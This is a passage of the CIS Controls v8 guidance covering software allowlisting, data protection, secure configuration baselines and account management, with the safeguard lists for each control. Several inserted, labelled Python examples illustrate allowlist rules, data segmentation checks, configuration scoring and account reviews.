vulnerabilities that have yet to have a patch released from the software vendor.
Depending on the severity of the exploit, an enterprise can implement temporary
mitigation measures to guard against attacks until the patch is released.

Management of software assets is also important to identify unnecessary security risks. An
enterprise should review its software inventory to identify any enterprise assets running
software that is not needed for business purposes. For example, an enterprise asset may come
installed with default software that creates a potential security risk and provides no benefit to
the enterprise. It is critical to inventory, understand, assess, and manage all software
connected to an enterprise’s infrastructure.

Procedures and tools

Allowlisting can be implemented using a combination of commercial allowlisting tools,
policies, or application execution tools that come with anti-malware suites and popular
operating systems. Commercial software inventory tools are widely available and used in
many enterprises today. The best of these tools provides an inventory check of hundreds of
common software used in enterprises. The tools pull information about the patch level of
each installed program to ensure that it is the latest version and leverage standardized
application names, such as those found in the Common Platform Enumeration (CPE)
specification. One example of a method that can be used is the Security Content Automation
Protocol (SCAP). Additional information on SCAP can be found here:
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-126r3.pdf

Features that implement allowlists are included in many modern endpoint security suites and
even natively implemented in certain versions of major operating systems. Moreover,
commercial solutions are increasingly bundling together anti-malware, antispyware, personal
firewall, and host-based IDS and Intrusion Prevention System (IPS), along with application
allow and block listing. In particular, most endpoint security solutions can look at the name,
file system location, and/or cryptographic hash of a given executable to determine whether
the application should be allowed to run on the protected machine. The most effective of
these tools offer custom allowlists based on executable path, hash, or regular expression
matching. Some even include a non-malicious, yet unapproved, applications function that
allows administrators to define rules for execution of specific software for certain users and
at certain times of the day.
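The three rule types named above (path, hash, regular expression), plus the “non-malicious, yet unapproved” user-and-time rule, can be shown in one decision function. The following Python is an added example, not code from the CIS Controls document and not the logic of any endpoint product: it evaluates a candidate executable against constructed rule sets in order of strength, hash first, and blocks anything that matches no rule. The rule sets, the sample executable bytes, the hour-of-day window, and the user names are assumptions made for the example.

```python
"""Application allowlist decision based on hash, path, and regex rules.

Added example, not from the CIS Controls document and not any vendor's
product logic. The rule sets, the sample executable bytes, and the
"conditional" user/time-window rule are constructed assumptions.
"""
import hashlib
import re

# Constructed sample executable and the hash rule derived from it.
SAMPLE_BINARY = b"\x7fELF constructed sample program bytes"
ALLOW_HASHES = {hashlib.sha256(SAMPLE_BINARY).hexdigest(): "approved-tool-1.2"}
# Path rules trust a location; regex rules trust a naming pattern.
ALLOW_PATHS = {"/usr/bin/ssh", "C:\\Program Files\\Vendor\\app.exe"}
ALLOW_REGEX = [re.compile(r"^/opt/approved/[^/]+\.AppImage$")]
# Non-malicious but unapproved software: allowed only for named users
# within an hour-of-day window (start inclusive, end exclusive).
CONDITIONAL = {
    "/opt/tools/bulk-export": {"users": {"analyst"}, "hours": (8, 18)},
}


def sha256_of(content: bytes) -> str:
    """Content hash used by hash rules; binds the rule to exact bytes."""
    return hashlib.sha256(content).hexdigest()


def decide(path, content, user, hour, *, hashes=ALLOW_HASHES,
           paths=ALLOW_PATHS, regexes=ALLOW_REGEX, conditional=CONDITIONAL):
    """Return (verdict, reason); verdict is 'allow' or 'block'.

    Rules are tried strongest first: hash, then path, then regex, then
    the conditional rule. Anything unmatched is blocked (default deny).
    """
    digest = sha256_of(content)
    if digest in hashes:
        return "allow", "hash:" + hashes[digest]
    if path in paths:
        return "allow", "path"
    if any(r.match(path) for r in regexes):
        return "allow", "regex"
    rule = conditional.get(path)
    if rule is not None:
        start, end = rule["hours"]
        if user in rule["users"] and start <= hour < end:
            return "allow", "conditional"
        return "block", "conditional-rule-not-satisfied"
    return "block", "default-deny"


if __name__ == "__main__":
    for args in [("/tmp/dl/tool", SAMPLE_BINARY, "bob", 12),
                 ("/usr/bin/ssh", b"any bytes", "bob", 12),
                 ("/opt/tools/bulk-export", b"x", "analyst", 22),
                 ("/home/bob/setup.exe", b"x", "bob", 12)]:
        print(args[0], args[2], args[3], "->", decide(*args))
```

The ordering matters for review: a path rule allows whatever currently sits at that path, so for any file that can be replaced on disk a hash rule is the one to prefer, and the example's `/usr/bin/ssh` entry is shown allowing arbitrary bytes precisely to make that weakness visible.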

→ For cloud-specific guidance, refer to the CIS Controls Cloud Companion
Guide – https://www.cisecurity.org/controls/v8/

→ For tablet and smart phone guidance, refer to the CIS Controls Mobile Companion
Guide – https://www.cisecurity.org/controls/v8/

→ For IoT guidance, refer to the CIS Controls Internet of Things Companion
Guide – https://www.cisecurity.org/controls/v8/

→ For Industrial Control Systems (ICS) guidance, refer to the CIS Controls ICS
Implementation Guide – https://www.cisecurity.org/controls/v8/

Safeguards

2.1 Establish and Maintain a Software Inventory
Asset Type: Applications | Security Function: Identify | Implementation Groups: IG1, IG2, IG3
Establish and maintain a detailed inventory of all licensed software installed on enterprise assets. The software inventory
must document the title, publisher, initial install/use date, and business purpose for each entry; where appropriate, include
the Uniform Resource Locator (URL), app store(s), version(s), deployment mechanism, and decommission date. Review and
update the software inventory bi-annually, or more frequently.

2.2 Ensure Authorized Software is Currently Supported
Asset Type: Applications | Security Function: Identify | Implementation Groups: IG1, IG2, IG3
Ensure that only currently supported software is designated as authorized in the software inventory for enterprise assets. If
software is unsupported, yet necessary for the fulfillment of the enterprise’s mission, document an exception detailing
mitigating controls and residual risk acceptance. For any unsupported software without an exception documentation,
designate as unauthorized. Review the software list to verify software support at least monthly, or more frequently.

2.3 Address Unauthorized Software
Asset Type: Applications | Security Function: Respond | Implementation Groups: IG1, IG2, IG3
Ensure that unauthorized software is either removed from use on enterprise assets or receives a documented exception.
Review monthly, or more frequently.

2.4 Utilize Automated Software Inventory Tools
Asset Type: Applications | Security Function: Detect | Implementation Groups: IG2, IG3
Utilize software inventory tools, when possible, throughout the enterprise to automate the discovery and documentation of
installed software.

2.5 Allowlist Authorized Software
Asset Type: Applications | Security Function: Protect | Implementation Groups: IG2, IG3
Use technical controls, such as application allowlisting, to ensure that only authorized software can execute or be accessed.
Reassess bi-annually, or more frequently.

2.6 Allowlist Authorized Libraries
Asset Type: Applications | Security Function: Protect | Implementation Groups: IG2, IG3
Use technical controls to ensure that only authorized software libraries, such as specific .dll, .ocx, .so, etc., files are allowed to
load into a system process. Block unauthorized libraries from loading into a system process. Reassess bi-annually, or more
frequently.

2.7 Allowlist Authorized Scripts
Asset Type: Applications | Security Function: Protect | Implementation Groups: IG3
Use technical controls, such as digital signatures and version control, to ensure that only authorized scripts, such as specific
.ps1, .py, etc., files are allowed to execute. Block unauthorized scripts from executing. Reassess bi-annually, or more
frequently.

Control 03: Data Protection

Safeguards: Total 14 | IG1 6/14 | IG2 12/14 | IG3 14/14

Overview. Develop processes and technical controls to identify, classify, securely
handle, retain, and dispose of data.

Why is this Control critical?

Data is no longer only contained within an enterprise’s border; it is in the cloud, on portable
end-user devices where users work from home, and is often shared with partners or online
services that might have it anywhere in the world. In addition to sensitive data an enterprise
holds related to finances, intellectual property, and customer data, there also might be
numerous international regulations for protection of personal data. Data privacy has become
increasingly important, and enterprises are learning that privacy is about the appropriate use
and management of data, not just encryption. Data must be appropriately managed through
its entire life cycle. These privacy rules can be complicated for multi-national enterprises of
any size; however, there are fundamentals that can apply to all.

Once attackers have penetrated an enterprise’s infrastructure, one of their first tasks is to find
and exfiltrate data. Enterprises might not be aware that sensitive data is leaving their
environment because they are not monitoring data outflows.

While many attacks occur on the network, others involve physical theft of portable end-user
devices, attacks on service providers or other partners holding sensitive data. Other sensitive
enterprise assets may also include non-computing devices that provide management and
control of physical systems, such as Supervisory Control and Data Acquisition (SCADA)
systems.

The enterprise’s loss of control over protected or sensitive data is a serious and often
reportable business impact. While some data is compromised or lost as a result of theft or
espionage, the vast majority are a result of poorly understood data management rules, and
user error. The adoption of data encryption, both in transit and at rest, can provide mitigation
against data compromise, and, even more important, it is a regulatory requirement for most
controlled data.



Procedures and tools

It is important for an enterprise to develop a data management process that includes a data
management framework, data classification guidelines, and requirements for protection,
handling, retention, and disposal of data. There should also be a data breach process that
plugs into the incident response plan, and the compliance and communication plans. To
derive data sensitivity levels, enterprises need to catalog their key types of data and the
overall criticality (impact to its loss or corruption) to the enterprise. This analysis would be
used to create an overall data classification scheme for the enterprise. Enterprises may use
labels, such as “Sensitive,” “Confidential,” and “Public,” and classify their data according to
those labels.

Once the sensitivity of the data has been defined, a data inventory or mapping should be
developed that identifies software accessing data at various sensitivity levels and the
enterprise assets that house those applications. Ideally, the network would be separated so
that enterprise assets of the same sensitivity level are on the same network and separated
from enterprise assets with different sensitivity levels. If possible, firewalls need to control
access to each segment, and have user access rules applied to only allow those with a
business need to access the data.
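The data mapping and the segmentation rule in the two paragraphs above can be checked programmatically once the inventory exists. The following Python is an added example (not from the CIS Controls document): it takes a constructed data inventory labelled with the document's “Sensitive”, “Confidential” and “Public” scheme, derives each asset's highest sensitivity level, lists which applications touch data at each level, and reports network segments and individual assets that mix sensitivity levels, which is the condition Safeguard 3.12 asks the enterprise to avoid. The record layout, the label ranking, and the asset and segment names are assumptions made for the example.

```python
"""Data inventory with sensitivity labels and a segmentation check.

Added example (not from the CIS Controls document). Labels follow the
document's "Sensitive"/"Confidential"/"Public" scheme; the records, the
ranking, and the asset/segment names are constructed assumptions.
"""
from collections import defaultdict

# Rank labels so the most sensitive data on an asset decides its level.
RANK = {"Public": 0, "Confidential": 1, "Sensitive": 2}

# Constructed data inventory: (data set, label, application, asset, segment).
INVENTORY = [
    ("payroll",        "Sensitive",    "hr-app", "srv-hr01",  "seg-restricted"),
    ("customer-pii",   "Sensitive",    "crm",    "srv-crm01", "seg-internal"),
    ("price-list",     "Confidential", "erp",    "srv-erp01", "seg-internal"),
    ("marketing-site", "Public",       "www",    "web01",     "seg-dmz"),
    ("support-kb",     "Public",       "kb",     "srv-erp01", "seg-internal"),
]


def asset_levels(inventory=INVENTORY):
    """Highest sensitivity label handled by each asset (the mapping step)."""
    levels = {}
    for _, label, _, asset, _ in inventory:
        if asset not in levels or RANK[label] > RANK[levels[asset]]:
            levels[asset] = label
    return levels


def software_by_level(inventory=INVENTORY):
    """Which applications access data at each sensitivity level."""
    out = defaultdict(set)
    for _, label, app, _, _ in inventory:
        out[label].add(app)
    return {k: sorted(v) for k, v in out.items()}


def mixed_assets(inventory=INVENTORY):
    """Assets that process data at more than one sensitivity level."""
    labels = defaultdict(set)
    for _, label, _, asset, _ in inventory:
        labels[asset].add(label)
    return {a: sorted(ls, key=RANK.get) for a, ls in labels.items() if len(ls) > 1}


def segmentation_findings(inventory=INVENTORY):
    """Segments hosting assets of different sensitivity levels."""
    levels = asset_levels(inventory)
    seg_assets = defaultdict(set)
    for _, _, _, asset, seg in inventory:
        seg_assets[seg].add(asset)
    findings = []
    for seg, assets in sorted(seg_assets.items()):
        labels = {levels[a] for a in assets}
        if len(labels) > 1:
            findings.append((seg, sorted(assets), sorted(labels, key=RANK.get)))
    return findings


if __name__ == "__main__":
    print("asset levels:", asset_levels())
    print("software by level:", software_by_level())
    print("assets mixing levels:", mixed_assets())
    for seg, assets, labels in segmentation_findings():
        print(f"segment {seg} mixes {labels}: {assets}")
```

In the constructed data the check reports two things a reviewer would act on: `srv-erp01` processes both Confidential and Public data on one asset, and `seg-internal` hosts a Sensitive asset next to a Confidential one, so the firewall rules for that segment cannot be written per sensitivity level.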

For more comprehensive treatment of this topic, we suggest the following resources to help
the enterprise with data protection:

→ NIST® SP 800-88r1 Guides for Media Sanitization – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf

→ NIST® FIPS 140-2 – https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-2.pdf

→ NIST® FIPS 140-3 – https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-3.pdf

→ For cloud-specific guidance, refer to the CIS Controls Cloud Companion Guide –
https://www.cisecurity.org/controls/v8/

→ For tablet and smart phone guidance, refer to the CIS Controls Mobile Companion
Guide – https://www.cisecurity.org/controls/v8/

Safeguards

3.1 Establish and Maintain a Data Management Process
Asset Type: Data | Security Function: Identify | Implementation Groups: IG1, IG2, IG3
Establish and maintain a data management process. In the process, address data sensitivity, data owner, handling of data,
data retention limits, and disposal requirements, based on sensitivity and retention standards for the enterprise. Review and
update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

3.2 Establish and Maintain a Data Inventory
Asset Type: Data | Security Function: Identify | Implementation Groups: IG1, IG2, IG3
Establish and maintain a data inventory, based on the enterprise’s data management process. Inventory sensitive data, at a
minimum. Review and update inventory annually, at a minimum, with a priority on sensitive data.



3.3 Configure Data Access Control Lists
Asset Type: Data | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Configure data access control lists based on a user’s need to know. Apply data access control lists, also known as access
permissions, to local and remote file systems, databases, and applications.

3.4 Enforce Data Retention
Asset Type: Data | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Retain data according to the enterprise’s data management process. Data retention must include both minimum and
maximum timelines.

3.5 Securely Dispose of Data
Asset Type: Data | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Securely dispose of data as outlined in the enterprise’s data management process. Ensure the disposal process and method
are commensurate with the data sensitivity.

3.6 Encrypt Data on End-User Devices
Asset Type: Devices | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Encrypt data on end-user devices containing sensitive data. Example implementations can include: Windows BitLocker®,
Apple FileVault®, Linux® dm-crypt.

3.7 Establish and Maintain a Data Classification Scheme
Asset Type: Data | Security Function: Identify | Implementation Groups: IG2, IG3
Establish and maintain an overall data classification scheme for the enterprise. Enterprises may use labels, such as
“Sensitive,” “Confidential,” and “Public,” and classify their data according to those labels. Review and update the
classification scheme annually, or when significant enterprise changes occur that could impact this Safeguard.

3.8 Document Data Flows
Asset Type: Data | Security Function: Identify | Implementation Groups: IG2, IG3
Document data flows. Data flow documentation includes service provider data flows and should be based on the enterprise’s
data management process. Review and update documentation annually, or when significant enterprise changes occur that
could impact this Safeguard.

3.9 Encrypt Data on Removable Media
Asset Type: Data | Security Function: Protect | Implementation Groups: IG2, IG3
Encrypt data on removable media.

3.10 Encrypt Sensitive Data in Transit
Asset Type: Data | Security Function: Protect | Implementation Groups: IG2, IG3
Encrypt sensitive data in transit. Example implementations can include: Transport Layer Security (TLS) and Open Secure Shell
(OpenSSH).

3.11 Encrypt Sensitive Data at Rest
Asset Type: Data | Security Function: Protect | Implementation Groups: IG2, IG3
Encrypt sensitive data at rest on servers, applications, and databases containing sensitive data. Storage-layer encryption, also
known as server-side encryption, meets the minimum requirement of this Safeguard. Additional encryption methods may
include application-layer encryption, also known as client-side encryption, where access to the data storage device(s) does
not permit access to the plain-text data.

3.12 Segment Data Processing and Storage Based on Sensitivity
Asset Type: Network | Security Function: Protect | Implementation Groups: IG2, IG3
Segment data processing and storage based on the sensitivity of the data. Do not process sensitive data on enterprise assets
intended for lower sensitivity data.



3.13 Deploy a Data Loss Prevention Solution
Asset Type: Data | Security Function: Protect | Implementation Groups: IG3
Implement an automated tool, such as a host-based Data Loss Prevention (DLP) tool to identify all sensitive data stored,
processed, or transmitted through enterprise assets, including those located onsite or at a remote service provider, and
update the enterprise’s sensitive data inventory.



Control 04: Secure Configuration of Enterprise Assets and Software

Safeguards: Total 12 | IG1 7/12 | IG2 11/12 | IG3 12/12

Overview. Establish and maintain the secure configuration of enterprise assets
(end-user devices, including portable and mobile; network devices;
non-computing/IoT devices; and servers) and software (operating
systems and applications).

Why is this Control critical?

As delivered from manufacturers and resellers, the default configurations for enterprise assets
and software are normally geared towards ease-of-deployment and ease-of-use rather than
security. Basic controls, open services and ports, default accounts or passwords,
pre-configured Domain Name System (DNS) settings, older (vulnerable) protocols, and
pre-installation of unnecessary software can all be exploitable if left in their default state.
Further, these security configuration updates need to be managed and maintained over the
life cycle of enterprise assets and software. Configuration updates need to be tracked and
approved through configuration management workflow process to maintain a record that can
be reviewed for compliance, leveraged for incident response, and to support audits. This CIS
Control is important to on-premises devices, as well as remote devices, network devices, and
cloud environments.

Service providers play a key role in modern infrastructures, especially for smaller enterprises.
They often are not set up by default in the most secure configuration to provide flexibility for
their customers to apply their own security policies. Therefore, the presence of default
accounts or passwords, excessive access, or unnecessary services are common in default
configurations. These could introduce weaknesses that are under the responsibility of the
enterprise that is using the software, rather than the service provider. This extends to ongoing
management and updates, as some Platform as a Service (PaaS) only extend to the operating
system, so patching and updating hosted applications are under the responsibility of the
enterprise.

Even after a strong initial configuration is developed and applied, it must be continually
managed to avoid degrading security as software is updated or patched, new security
vulnerabilities are reported, and configurations are “tweaked,” to allow the installation of new
software or to support new operational requirements.

Procedures and tools

There are many available security baselines for each system. Enterprises should start with
these publicly developed, vetted, and supported security benchmarks, security guides, or
checklists. Some resources include:

→ The CIS Benchmarks™ Program – http://www.cisecurity.org/cis-benchmarks/

→ The National Institute of Standards and Technology (NIST®) National Checklist Program Repository –
https://nvd.nist.gov/ncp/repository

Enterprises should augment or adjust these baselines to satisfy enterprise security policies,
and industry and government regulatory requirements. Deviations of standard configurations
and rationale should be documented to facilitate future reviews or audits.

For a larger or more complex enterprise, there will be multiple security baseline configurations
based on security requirements or classification of the data on the enterprise asset. Here is an
example of the steps to build a secure baseline image:

01 Determine the risk classification of the data handled/stored on the enterprise asset (e.g.,
high, moderate, low risk).
02 Create a security configuration script that sets system security settings to meet the
requirements to protect the data used on the enterprise asset. Use benchmarks, such as
the ones described earlier in this section.
03 Install the base operating system software.
04 Apply appropriate operating system and security patches.
05 Install appropriate application software packages, tools, and utilities.
06 Apply appropriate updates to software installed in Step 4.
07 Install local customization scripts to this image.
08 Run the security script created in Step 2 to set the appropriate security level.
09 Run a SCAP compliant tool to record/score the system setting of the baseline image.
10 Perform a security quality assurance test.
11 Save this base image in a secure location.

Commercial and/or free configuration management tools, such as the CIS Configuration
Assessment Tool (CIS-CAT®) https://learn.cisecurity.org/cis-cat-lite, can be deployed to
measure the settings of operating systems and applications of managed machines to look for
deviations from the standard image configurations. Commercial configuration management
tools use some combination of an agent installed on each managed system, or agentless
inspection of systems through remotely logging into each enterprise asset using administrator
credentials. Additionally, a hybrid approach is sometimes used whereby a remote session is
initiated, a temporary or dynamic agent is deployed on the target system for the scan, and
then the agent is removed.
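A minimal form of the record/score step (Step 09 above) and of the deviation check these tools perform, as an added Python example that is not CIS-CAT, not a SCAP implementation, and not code from the document: a constructed baseline of settings with required values and a comparison rule is checked against a constructed dump of what an agent or remote session collected from one system, giving a pass percentage and the list of deviations to document or remediate. The key/value dump format, the item names, and the sample values are assumptions; only the 15-minute session lock bound is taken from Safeguard 4.3. A setting that is absent from the dump is counted as a failure rather than silently passing.

```python
"""Baseline configuration check: score a system's settings against a baseline.

Added example (not CIS-CAT or any SCAP tool, and not the document's code).
The settings dump format (key value lines), the baseline items and the
sample system output are constructed assumptions.
"""

# Constructed baseline: (setting, required value, comparison).
# 'eq' must match exactly; 'max' must be <= the value; 'min' must be >=.
BASELINE = [
    ("sshd.PermitRootLogin", "no", "eq"),
    ("sshd.PasswordAuthentication", "no", "eq"),
    ("login.MaxAuthTries", 4, "max"),
    ("screen.LockTimeoutMinutes", 15, "max"),   # Safeguard 4.3 upper bound
    ("password.MinLength", 14, "min"),
    ("telnet.Enabled", "no", "eq"),
]

# Constructed sample of what an agent or remote session collected.
SYSTEM_DUMP = """\
# key value
sshd.PermitRootLogin yes
sshd.PasswordAuthentication no
login.MaxAuthTries 6
screen.LockTimeoutMinutes 10
password.MinLength 14
"""


def parse_settings(text):
    """Parse 'key value' lines into a dict; comments and blanks are ignored."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        settings[key] = value.strip()
    return settings


def _as_number(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def check_item(actual, expected, op):
    """True if the collected value satisfies one baseline item."""
    if actual is None:
        return False                 # missing setting: fail, never pass
    if op == "eq":
        return str(actual).lower() == str(expected).lower()
    n = _as_number(actual)
    if n is None:
        return False                 # non-numeric where a number is required
    return n <= expected if op == "max" else n >= expected


def assess(dump=SYSTEM_DUMP, baseline=BASELINE):
    """Return (score_percent, deviations); a deviation is (key, actual, expected, op)."""
    settings = parse_settings(dump)
    deviations = []
    for key, expected, op in baseline:
        actual = settings.get(key)
        if not check_item(actual, expected, op):
            deviations.append((key, actual, expected, op))
    passed = len(baseline) - len(deviations)
    return round(100.0 * passed / len(baseline), 1), deviations


if __name__ == "__main__":
    score, devs = assess()
    print(f"score: {score}% ({len(BASELINE) - len(devs)}/{len(BASELINE)} items pass)")
    for key, actual, expected, op in devs:
        print(f"  DEVIATION {key}: got {actual!r}, need {op} {expected!r}")
```

Running the same `assess` against the saved baseline image and then periodically against deployed machines is what turns the one-time score of Step 09 into the ongoing drift detection the paragraph above describes; the deviation list is also the natural place to attach the documented exceptions the preceding text calls for.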

Safeguards

4.1 Establish and Maintain a Secure Configuration Process
Asset Type: Applications | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Establish and maintain a secure configuration process for enterprise assets (end-user devices, including portable and mobile;
non-computing/IoT devices; and servers) and software (operating systems and applications). Review and update
documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

4.2 Establish and Maintain a Secure Configuration Process for Network Infrastructure
Asset Type: Network | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Establish and maintain a secure configuration process for network devices. Review and update documentation annually, or
when significant enterprise changes occur that could impact this Safeguard.

4.3 Configure Automatic Session Locking on Enterprise Assets
Asset Type: Users | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Configure automatic session locking on enterprise assets after a defined period of inactivity. For general purpose operating
systems, the period must not exceed 15 minutes. For mobile end-user devices, the period must not exceed 2 minutes.

4.4 Implement and Manage a Firewall on Servers
Asset Type: Devices | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Implement and manage a firewall on servers, where supported. Example implementations include a virtual firewall, operating
system firewall, or a third-party firewall agent.

4.5 Implement and Manage a Firewall on End-User Devices
Asset Type: Devices | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Implement and manage a host-based firewall or port-filtering tool on end-user devices, with a default-deny rule that drops all
traffic except those services and ports that are explicitly allowed.

4.6 Securely Manage Enterprise Assets and Software
Asset Type: Network | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Securely manage enterprise assets and software. Example implementations include managing configuration through
version-controlled infrastructure-as-code and accessing administrative interfaces over secure network protocols, such as
Secure Shell (SSH) and Hypertext Transfer Protocol Secure (HTTPS). Do not use insecure management protocols, such as
Telnet (Teletype Network) and HTTP, unless operationally essential.

4.7 Manage Default Accounts on Enterprise Assets and Software
Asset Type: Users | Security Function: Protect | Implementation Groups: IG1, IG2, IG3
Manage default accounts on enterprise assets and software, such as root, administrator, and other pre-configured vendor
accounts. Example implementations can include: disabling default accounts or making them unusable.

4.8 Uninstall or Disable Unnecessary Services on Enterprise Assets and Software
Asset Type: Devices | Security Function: Protect | Implementation Groups: IG2, IG3
Uninstall or disable unnecessary services on enterprise assets and software, such as an unused file sharing service, web
application module, or service function.

4.9 Configure Trusted DNS Servers on Enterprise Assets
Asset Type: Devices | Security Function: Protect | Implementation Groups: IG2, IG3
Configure trusted DNS servers on enterprise assets. Example implementations include: configuring assets to use
enterprise-controlled DNS servers and/or reputable externally accessible DNS servers.

4.10 Enforce Automatic Device Lockout on Portable End-User Devices (Devices; Respond; IG2, IG3)
Enforce automatic device lockout following a predetermined threshold of local failed authentication attempts on portable end-user devices, where supported. For laptops, do not allow more than 20 failed authentication attempts; for tablets and smartphones, no more than 10 failed authentication attempts. Example implementations include Microsoft® Intune Device Lock and Apple® Configuration Profile maxFailedAttempts.

4.11 Enforce Remote Wipe Capability on Portable End-User Devices (Devices; Protect; IG2, IG3)
Remotely wipe enterprise data from enterprise-owned portable end-user devices when deemed appropriate such as lost or stolen devices, or when an individual no longer supports the enterprise.

4.12 Separate Enterprise Workspaces on Mobile End-User Devices (Devices; Protect; IG3)
Ensure separate enterprise workspaces are used on mobile end-user devices, where supported. Example implementations include using an Apple® Configuration Profile or Android™ Work Profile to separate enterprise applications and data from personal applications and data.

Control 05 Account Management
Safeguards: Total 6; IG1 4/6; IG2 6/6; IG3 6/6

Overview: Use processes and tools to assign and manage authorization to credentials for user accounts, including administrator accounts, as well as service accounts, to enterprise assets and software.

Why is this Control critical?

It is easier for an external or internal threat actor to gain unauthorized access to enterprise assets or data through using valid user credentials than through “hacking” the environment. There are many ways to covertly obtain access to user accounts, including: weak passwords, accounts still valid after a user leaves the enterprise, dormant or lingering test accounts, shared accounts that have not been changed in months or years, service accounts embedded in applications for scripts, a user having the same password as one they use for an online account that has been compromised (in a public password dump), social engineering a user to give their password, or using malware to capture passwords or tokens in memory or over the network.

Administrative, or highly privileged, accounts are a particular target, because they allow attackers to add other accounts, or make changes to assets that could make them more vulnerable to other attacks. Service accounts are also sensitive, as they are often shared among teams, internal and external to the enterprise, and sometimes not known about, only to be revealed in standard account management audits.

Finally, account logging and monitoring is a critical component of security operations. While account logging and monitoring are covered in CIS Control 8 (Audit Log Management), it is important in the development of a comprehensive Identity and Access Management (IAM) program.

Procedures and tools

Credentials are assets that must be inventoried and tracked like enterprise assets and software, as they are the primary entry point into the enterprise. Appropriate password policies and guidance not to reuse passwords should be developed.



→ For guidance on the creation and use of passwords, reference the CIS Password Policy Guide – https://www.cisecurity.org/white-papers/cis-password-policy-guide/

Accounts must also be tracked; any account that is dormant must be disabled and eventually removed from the system. There should be periodic audits to ensure all active accounts are traced back to authorized users of the enterprise asset. Look for new accounts added since the previous review, especially administrator and service accounts. Close attention should be paid to identifying and tracking administrative, or high-privileged, accounts and service accounts.
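The review described above can be scripted. As an added example that is not part of the CIS Controls document, the following traces each account active on a system back to an authorized inventory record, flags accounts past their stop date or absent from the inventory, identifies dormant accounts using the 45-day threshold that Safeguard 5.3 sets, and lists administrator and service accounts created since the previous review. The inventory fields and all sample accounts are constructed for this example.

```python
"""Periodic account review (added example, not from the CIS Controls document).

Traces every account that is active on enterprise systems back to an
authorized inventory record, flags dormant accounts using the 45-day
threshold from Safeguard 5.3, and lists administrator and service accounts
added since the previous review. Inventory fields and all sample accounts
are constructed for this example.
"""
from dataclasses import dataclass, field
from datetime import date
from typing import Dict, Iterable, List, Optional

DORMANT_DAYS = 45  # Safeguard 5.3: disable after 45 days of inactivity


@dataclass(frozen=True)
class Account:
    username: str
    name: str                   # person (or owning team for service accounts)
    department: str
    start: date                 # authorization start date
    stop: Optional[date]        # authorization end date, None while still valid
    kind: str                   # "user", "admin" or "service"
    last_logon: Optional[date]  # None if the account has never been used


@dataclass
class ReviewResult:
    unauthorized: List[str] = field(default_factory=list)    # active but not authorized
    dormant: List[str] = field(default_factory=list)         # no activity for > DORMANT_DAYS
    new_privileged: List[str] = field(default_factory=list)  # admin/service accounts added since last review


def review_accounts(inventory: Iterable[Account], active_on_systems: Iterable[str],
                    last_review: date, today: date) -> ReviewResult:
    """Compare accounts found enabled on systems with the authorized inventory."""
    by_user: Dict[str, Account] = {a.username.lower(): a for a in inventory}
    result = ReviewResult()
    for username in sorted(set(u.lower() for u in active_on_systems)):
        acct = by_user.get(username)
        # Not in the inventory, or the authorization period has ended: should not exist.
        if acct is None or (acct.stop is not None and acct.stop < today):
            result.unauthorized.append(username)
            continue
        # Inactivity is measured from the last logon, or from creation if never used.
        last_activity = acct.last_logon or acct.start
        if (today - last_activity).days > DORMANT_DAYS:
            result.dormant.append(username)
        if acct.kind in ("admin", "service") and acct.start > last_review:
            result.new_privileged.append(username)
    return result


# Constructed sample data.
TODAY = date(2024, 3, 1)
LAST_REVIEW = date(2023, 12, 1)
INVENTORY = [
    Account("jdoe", "J. Doe", "Finance", date(2021, 1, 4), None, "user", date(2024, 2, 27)),
    Account("jdoe-adm", "J. Doe", "Finance", date(2024, 1, 15), None, "admin", date(2024, 2, 28)),
    Account("rsmith", "R. Smith", "Sales", date(2019, 5, 6), date(2024, 1, 31), "user", date(2024, 1, 30)),
    Account("svc-backup", "Backup team", "IT", date(2020, 9, 1), None, "service", date(2023, 12, 20)),
    Account("test-qa", "QA team", "Engineering", date(2023, 6, 1), None, "user", None),
]
# Accounts observed as enabled on the systems themselves (e.g. from a directory export).
ACTIVE_ON_SYSTEMS = ["jdoe", "jdoe-adm", "rsmith", "svc-backup", "test-qa", "tmp-vendor"]


def run_sample_review() -> ReviewResult:
    return review_accounts(INVENTORY, ACTIVE_ON_SYSTEMS, LAST_REVIEW, TODAY)


if __name__ == "__main__":
    r = run_sample_review()
    print("Unauthorized:", r.unauthorized)      # ['rsmith', 'tmp-vendor']
    print("Dormant:", r.dormant)                # ['svc-backup', 'test-qa']
    print("New privileged:", r.new_privileged)  # ['jdoe-adm']
```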

Users with administrator or other privileged access should have separate accounts for those higher authority tasks. These accounts would only be used when performing those tasks or accessing especially sensitive data, to reduce risk in case their normal user account is compromised. For users with multiple accounts, their base user account, used day-to-day for non-administrative tasks, should not have any elevated privileges.

Single Sign-On (SSO) is convenient and secure when an enterprise has many applications, including cloud applications, which helps reduce the number of passwords a user must manage. Users are recommended to use password manager applications to securely store their passwords, and should be instructed not to keep them in spreadsheets or text files on their computers. MFA is recommended for remote access.

Users must also be automatically logged out of the system after a period of inactivity, and be trained to lock their screen when they leave their device to minimize the possibility of someone else in physical proximity around the user accessing their system, applications, or data.

→ An excellent resource is the NIST® Digital Identity Guidelines – https://pages.nist.gov/800-63-3/

Safeguards (each entry lists asset type; security function; applicable Implementation Groups)

5.1 Establish and Maintain an Inventory of Accounts (Users; Identify; IG1, IG2, IG3)
Establish and maintain an inventory of all accounts managed in the enterprise. The inventory must include both user and administrator accounts. The inventory, at a minimum, should contain the person’s name, username, start/stop dates, and department. Validate that all active accounts are authorized, on a recurring schedule at a minimum quarterly, or more frequently.

5.2 Use Unique Passwords (Users; Protect; IG1, IG2, IG3)
